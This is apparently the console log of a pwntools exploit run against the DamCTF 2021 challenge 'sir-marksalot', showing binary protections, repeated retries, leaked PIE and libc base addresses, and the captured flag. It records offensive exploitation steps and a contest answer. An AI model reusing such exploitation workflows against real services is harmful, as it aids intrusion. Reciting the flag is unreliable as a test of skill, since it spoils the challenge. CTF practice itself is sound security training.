# ./exploit.py REMOTE=1
[*] '/pwd/datajerk/damctf2021/sir-marksalot/sir-marksalot'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] '/pwd/datajerk/damctf2021/sir-marksalot/libc6_2.27-3ubuntu1.4_amd64.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] pass 1
[*] rand 10,35
[*] grue at 27,11
[*] time check: 10.89646053314209s
[CRITICAL] cannot backtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 33,8
[*] grue at 22,35
[*] time check: 9.90454387664795s
[*] leak: 0x55d1466df217
[*] binary.address: 0x55d1466de000
[CRITICAL] cannot forwardtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 29,27
[*] grue at 14,35
[*] time check: 7.7008819580078125s
[CRITICAL] cannot backtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 20,17
[*] grue at 23,29
[*] time check: 13.295406818389893s
[CRITICAL] cannot backtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 15,39
[*] grue at 14,20
[*] time check: 6.57252049446106s
[*] leak: 0x5575db992217
[*] binary.address: 0x5575db991000
[*] time check: 8.000957250595093s
[*] time check: 19.56699538230896s
[*] leak: 0x7fca46969aa0
[*] libc.address: 0x7fca468e9000
[CRITICAL] cannot forwardtrack 4 libc
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 17,36
[*] grue at 15,16
[*] time check: 8.432896137237549s
[*] leak: 0x5644d01bc217
[*] binary.address: 0x5644d01bb000
[CRITICAL] cannot backtrack 2
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 39,27
[*] grue at 33,24
[*] time check: 3.5341670513153076s
[*] leak: 0x5579f122e217
[*] binary.address: 0x5579f122d000
[CRITICAL] cannot forwardtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 25,25
[*] grue at 8,10
[*] time check: 9.614848613739014s
[*] leak: 0x556cea384217
[*] binary.address: 0x556cea383000
[CRITICAL] cannot backtrack 2
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 35,26
[CRITICAL] rand mismatch
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 39,20
[*] grue at 9,31
[*] time check: 5.343125104904175s
[CRITICAL] cannot backtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 13,12
[*] grue at 10,20
[*] time check: 14.848585605621338s
[CRITICAL] cannot backtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 13,39
[CRITICAL] rand mismatch
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 16,6
[*] grue at 6,36
[*] time check: 17.650628805160522s
[CRITICAL] cannot backtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 34,32
[*] grue at 26,31
[*] time check: 3.987689733505249s
[*] leak: 0x561d6b716217
[*] binary.address: 0x561d6b715000
[*] time check: 5.484457969665527s
[*] time check: 12.007320642471313s
[*] leak: 0x7fcb372b0aa0
[*] libc.address: 0x7fcb37230000
[CRITICAL] cannot forwardtrack 4 libc
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 36,34
[CRITICAL] rand mismatch
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 25,29
[*] grue at 39,35
[*] time check: 8.0506911277771s
[CRITICAL] cannot backtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 3,1
[*] grue at 31,27
[*] time check: 19.22429060935974s
[*] leak: 0x55d4e1110217
[*] binary.address: 0x55d4e110f000
[CRITICAL] cannot backtrack 2
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 38,24
[*] grue at 27,35
[*] time check: 5.171254873275757s
[*] leak: 0x56517b22b217
[*] binary.address: 0x56517b22a000
[CRITICAL] cannot forwardtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 1,31
[CRITICAL] rand mismatch
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 1,31
[*] grue at 7,20
[*] time check: 14.786654472351074s
[CRITICAL] cannot backtrack 4
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 14,23
[CRITICAL] rand mismatch
[*] Closed connection to chals.damctf.xyz port 31314
[+] Opening connection to chals.damctf.xyz on port 31314: Done
[*] pass 1
[*] rand 22,10
[*] grue at 35,5
[*] time check: 14.545537948608398s
[*] leak: 0x564ffb97c217
[*] binary.address: 0x564ffb97b000
[*] time check: 16.248239994049072s
[*] time check: 28.25818371772766s
[*] leak: 0x7effa3cb4aa0
[*] libc.address: 0x7effa3c34000
[*] pass 2
[*] x,y = 3,24
[*] rand 3,24
[*] grue at 24,37
[*] time check: 44.448073863983154s
[*] time check: 46.049169301986694s
[*] time check: 51.75443744659424s
dam{1n73N710N4LLy_93771n9_3473n_8y_4_9rU3-7H47_w42_9Ru3S0M3}
